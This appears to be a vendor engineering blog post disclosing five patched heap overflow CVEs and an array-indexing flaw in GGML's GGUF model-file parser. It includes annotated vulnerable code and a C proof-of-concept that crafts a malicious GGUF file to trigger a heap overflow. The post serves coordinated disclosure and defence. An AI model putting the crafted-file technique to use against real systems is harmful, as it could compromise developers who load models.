Skip to main content
Engineering blog

The GGUF file format is a binary file format used for storing and loading model weights for the GGML library. The library documentation describes the format as follows:

"GGUF is a file format for storing models for inference with GGML and executors based on GGML. GGUF is a binary format that is designed for fast loading and saving of models, and for ease of reading. Models are traditionally developed using PyTorch or another framework, and then converted to GGUF for use in GGML."

The GGUF format has recently become popular for distributing trained machine learning models, and has become one of the most commonly used formats for Llama-2 when utilizing the model from a low level context. There are multiple vectors that can be used to provide data to this loader, including llama.cpp, the python llm module, and the ctransformers library when loading gguf files, such as those from Huggingface.

The GGML library performs insufficient validation on the input file and, therefore, contains a selection of potentially exploitable memory corruption vulnerabilities during parsing. An attacker could leverage these vulnerabilities to execute code on the victim's computer via serving a crafted gguf file.

In this blog, we will look at some of the heap overflows which are fairly easy to exploit. Since there is almost no bounds checking done on the file, there are numerous other cases where allocations are performed with unbounded user input and wrapped values. It is also worth noting that very few return values are checked throughout the code base, including the memory allocations. All the heap overflows are reachable via the gguf_init_from_file() entry point.

Timeline

  1. Jan 23rd 2024: Vendor Contacted, bugs reported
  2. Jan 25th 2024: CVE's Requested
  3. Jan 28th 2024: Reviewed Fixes in GGML Github
  4. Jan 29th 2024: Patches Merged into master branch

CVE-2024-25664 Heap Overflow #1: Unchecked KV Count

The entry point to the library, when loading a saved model, is typically via the gguf_init_from_file() function (shown annotated below). This function begins by reading the gguf header from the file before checking for the magic value "GGUF". After this, the key-value pairs within the file are read and parsed.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19215

struct gguf_context * gguf_init_from_file(const char * fname, struct 
gguf_init_params params) {
       FILE * file = fopen(fname, "rb");
       if (!file) {
			 return NULL;
       }
	   ...
       gguf_fread_el(file, &magic, sizeof(magic), &offset);
       for (uint32_t i = 0; i < sizeof(magic); i++) {
              if (magic[i] != GGUF_MAGIC[i]) {
                     fprintf(stderr, "%s: invalid magic characters '%c%c%c%c'\n",
                     __func__, magic[0], magic[1], magic[2], magic[3]);
                     fclose(file);
                     return NULL;
              }
       }
       ...
struct gguf_context * ctx = GGML_ALIGNED_MALLOC(sizeof(struct 
       gguf_context));
...
// read the header
...
strncpy(ctx->header.magic, magic, 4);

ok = ok && gguf_fread_el(file, &ctx->header.version, sizeof(ctx->header.version), 
&offset);
ok = ok && gguf_fread_el(file, &ctx->header.n_tensors, sizeof(ctx-
>header.n_tensors), &offset);
ok = ok && gguf_fread_el(file, &ctx->header.n_kv, sizeof(ctx->header.n_kv), 
&offset);  // File header is read in unchecked
...
// read the kv pairs
ctx->kv = malloc(ctx->header.n_kv * sizeof(struct gguf_kv)); // Allocation of 
buffer to copy in each key value pair struct wraps, and can be small for 
large value of n_kv.
...
for (uint64_t i = 0; i < ctx->header.n_kv; ++i) { // Loop using n_kv to terminate
struct gguf_kv * kv = &ctx->kv[i]; // Copy in target for each array element, 
running out of bounds of the allocated array.

The contents of the wrapped allocation are an array of gguf_kv structures, which are used to store key-value pairs of data read from the file. The definition of the structure is as follows:

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19133

struct gguf_kv {
     struct gguf_str key;
     enum gguf_type type;
     union gguf_value value;
};

This allows us to overwrite adjacent memory with either data we control using the value field or a pointer to data we control in the case of the key field. These are fairly powerful primitives for heap exploitation. Due to the nature of the parsing, it is also possible to manipulate the heap state in a fairly arbitrary manner. This should also make exploitation easier.

The following PoC code causes an allocation of 0xe0 while having an n_kv value of 0x55555555555555a, which is used as the loop counter writing into the chunk. Each write is 0x30 sized (sizeof(struct gguf_kv)) and this results in heap memory being smashed containing our 0x500 kv's. To terminate the loop, we simply end the file early, resulting in an EOF read and an error condition. The subsequent usage of the heap results in a failed checksum due to the overflow and an abort() error message.

/*
 * GGUF Heap Overflow PoC
 * Databricks AI Security Team
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ggml/ggml.h>

int main(int ac, char **av)
{
   if(ac != 2) {
      printf("usage: %s <filename>\n",av[0]);
      exit(1);
   }
   unsigned int version = 4;
   unsigned long n_tensors = 0;
   unsigned long n_kv = 0x55555555555555a; // Wrap allocation size to 0xe0
   unsigned long val = 0x4141414141414141; // Value to write out of bounds
   printf("[+] Writing to file: %s\n",av[1]);
   FILE *fp = fopen(av[1],"wb");
   if(!fp) {
      printf("Unable to write out file.\n");
      exit(1);
   } 
   printf("[+] Writing header.\n");
   fwrite("GGUF",4,1,fp); // magic
   fwrite(&version,sizeof(version),1,fp);
   fwrite(&n_tensors,sizeof(n_tensors),1,fp);
   fwrite(&n_kv,sizeof(n_kv),1,fp);
   //struct gguf_kv kv;
   uint64_t n = 4;
   char *key = "foo";
   unsigned int type = 10;   // GGUF_TYPE_UINT64  = 10,
   printf("[+] Writing gguf_kvs.\n");
   // Write  overflow
   for(int i = 0 ; i < 0x500 ; i++) {
     fwrite(&n,sizeof(n),1,fp);
     fwrite(key,strlen(key)+1,1,fp);
     fwrite(&type,sizeof(type),1,fp);
     fwrite(&val,sizeof(val),1,fp);
   }
        
   // EOF Trigger unwind/heap usage
   fclose(fp);
}
gguf_init_from_file: failed to read key-value pairs
loader(95967,0x1dd2ad000) malloc: *** error for object 0x300000002: pointer being
freed was not allocated
loader(95967,0x1dd2ad000) malloc: *** set a breakpoint in malloc_error_break to 
debug
Process 95967 stopped
* thread #1, stop reason = signal SIGABRT
  frame #0: 0x0000000186a960dc
->  0x186a960dc: b.lo   0x186a960fc
   0x186a960e0: pacibsp 
   0x186a960e4: stp    x29, x30, [sp, #-0x10]!
   0x186a960e8: mov    x29, sp
Target 0: (loader) stopped.

CVE-2024-25665 Heap Overflow #2: Reading string types

Another potentially exploitable heap overflow vulnerability exists in the function gguf_fread_str(), which is used repeatedly to read string-type data from the file.

As you can see in the code below, this function reads a length-encoded string directly from the file with no validation. Firstly, the length of the string is read using gguf_fread_el(). Next, an allocation of the arbitrary input size + 1 is performed. By providing a size of 0xffffffffffffffff, the addition will cause the value to wrap back to 0. When the allocator receives this size it will return a chunk sized as the smallest possible quanta used by the allocator. After this is done, a copy will be performed using the fread() function using the large unwrapped size.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19177

static bool gguf_fread_el(FILE * file, void * dst, size_t size, size_t * offset) {
 const size_t n = fread(dst, 1, size, file);
 *offset += n;
 return n == size;
}

static bool gguf_fread_str(FILE * file, struct gguf_str * p, size_t * offset) {
 p->n    = 0;
 p->data = NULL;

 bool ok = true;

 ok = ok && gguf_fread_el(file, &p->n,    sizeof(p->n), offset); p->data = calloc(p->n + 1, 1); 
 // allocation wraps
 ok = ok && gguf_fread_el(file,  p->data, p->n,         offset);  // overflow 

 return ok;
}

CVE-2024-25666 Heap Overflow #3: Tensor count unchecked

A very similar heap overflow to #1 exists when parsing the gguf_tensor_infos in the file. The ctx->header.n_tensors value is unchecked and multiplied once again by the size of a struct, resulting in a wrap and a smaller allocation. Following this, a loop copies each element in turn, resulting in a heap overflow. The code below shows this vulnerability.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19345

// read the tensor infos
{
 ctx->infos = malloc(ctx->header.n_tensors * sizeof(struct gguf_tensor_info)); // 
Allocate buffer, wrap resulting in small allocation.

   for (uint64_t i = 0; i < ctx->header.n_tensors; ++i) {
    struct gguf_tensor_info * info = &ctx->infos[i]; // Iterate through the array copying 
in each element, running out of bounds

CVE-2024-25667 Heap Overflow #4: User-supplied Array Elements

When unpacking the kv values from the file, one of the types that can be unpacked is the array type (GGUF_TYPE_ARRAY). When parsing arrays, the code reads the type of the array, followed by the number of elements of that type. It then multiplies the type size from the GGUF_TYPE_SIZE array with the number of elements to calculate the allocation size to store the data. Once again, since the number of array elements is user-supplied and arbitrary, this calculation can wrap, resulting in a small allocation of memory, followed by a large copy loop. Due to the compact nature of the array data, this provides a very controlled overflow over heap contents, which can be terminated by a failed file read.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19297

case GGUF_TYPE_ARRAY:
      {
      ok = ok && gguf_fread_el(file, &kv->value.arr.type, sizeof(kv->value.arr.type), 
&offset);
      ok = ok && gguf_fread_el(file, &kv->value.arr.n,  sizeof(kv->value.arr.n), 
&offset);
      switch (kv->value.arr.type) {
...                        
  	     case <types>:
         {
         kv->value.arr.data = malloc(kv->value.arr.n * GGUF_TYPE_SIZE[kv-
>value.arr.type]);
         ok = ok && gguf_fread_el(file, kv->value.arr.data, kv->value.arr.n * 
GGUF_TYPE_SIZE[kv->value.arr.type], &offset);
           } break;

CVE-2024-25668 Heap Overflow #5: Unpacking kv string type arrays

Another heap overflow issue exists during the array kv unpacking when dealing with arrays of string type. When parsing strings, once again, an element count is read directly from the file unchecked. This value is multiplied by the size of the gguf_str struct, resulting in a wrap and a small allocation relative to n. Following this, a loop is performed up to the n value in order to populate the chunk. This results in an out-of-bounds write of the string struct contents.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19318

case GGUF_TYPE_STRING:
 {
  kv->value.arr.data = malloc(kv->value.arr.n * sizeof(struct gguf_str));
  for (uint64_t j = 0; j < kv->value.arr.n; ++j) {
   ok = ok && gguf_fread_str(file, &((struct gguf_str *) kv->value.arr.data)[j], 
&offset);
   }
  } break;

Unbounded Array Indexing

During the parsing of arrays within the GGUF file, as mentioned above, the required size of a type is determined for allocation via the GGUF_TYPE_SIZE[] array (shown below).

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19076

static const size_t GGUF_TYPE_SIZE[GGUF_TYPE_COUNT] = {
 [GGUF_TYPE_UINT8]   = sizeof(uint8_t),
 [GGUF_TYPE_INT8]    = sizeof(int8_t),
 [GGUF_TYPE_UINT16]  = sizeof(uint16_t),
 [GGUF_TYPE_INT16]   = sizeof(int16_t),
 [GGUF_TYPE_UINT32]  = sizeof(uint32_t),
 [GGUF_TYPE_INT32]   = sizeof(int32_t),
 [GGUF_TYPE_FLOAT32] = sizeof(float),
 [GGUF_TYPE_BOOL]    = sizeof(bool),
 [GGUF_TYPE_STRING]  = sizeof(struct gguf_str),
 [GGUF_TYPE_UINT64]  = sizeof(uint64_t),
 [GGUF_TYPE_INT64]   = sizeof(int64_t),
 [GGUF_TYPE_FLOAT64] = sizeof(double),
 [GGUF_TYPE_ARRAY]   = 0, // undefined
};

By indexing into the array, the appropriate size is returned in order to calculate the allocation size via multiplication.

The index used to access this array is read directly from the file and is not sanitized, therefore, an attacker could provide an index outside the bounds of this array, returning a size that causes an integer wrap. This is used in both an allocation and a copy.

The following code demonstrates this path:

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b72 1289efcbf50c557f55/src/ggml.c#L19300

        ok = ok && gguf_fread_el(file, &kv->value.arr.n,    sizeof(kv-
>value.arr.n), &offset); // Read the type value from the file

        switch (kv->value.arr.type) {
  ...
            {
            kv->value.arr.data = malloc(kv->value.arr.n * 
GGUF_TYPE_SIZE[kv->value.arr.type]); // deref the GGUF_TYPE_SIZE 
array using the arbitrary value.
            ok = ok && gguf_fread_el(file, kv->value.arr.data, kv-
>value.arr.n * GGUF_TYPE_SIZE[kv->value.arr.type], &offset);

Conclusion

These vulnerabilities would provide yet another way for an attacker to utilize machine learning models to distribute malware and compromise developers. The security posture of this new and rapidly growing field of research greatly benefits from a more rigorous approach to security review. In that frame, Databricks worked closely with the GGML.ai team, and together we quickly addressed these issues. The patches have been available since commit 6b14d73 which fixes all 6 vulnerabilities discussed in this post.

Try Databricks for free

Related posts

Platform blog

Introducing the Databricks AI Security Framework (DASF)

We are excited to announce the release of the Databricks AI Security Framework (DASF) version 1.0 whitepaper! The framework is designed to improve...
Engineering blog

Implementing LLM Guardrails for Safe and Responsible Generative AI Deployment on Databricks

Introduction Let’s explore a common scenario – your team is eager to leverage open source LLMs to build chatbots for customer support interactions...
Company blog

AI Regulation is Rolling Out…And the Data Intelligence Platform is Here to Help

Policymakers around the world are paying increased attention to artificial intelligence. The world’s most comprehensive AI regulation to date was just passed by...
Generative AI

Building and Customizing GenAI with Databricks: LLMs and Beyond

Generative AI has opened new worlds of possibilities for businesses and is being emphatically embraced across organizations. According to a recent MIT Tech...
See all Engineering Blog posts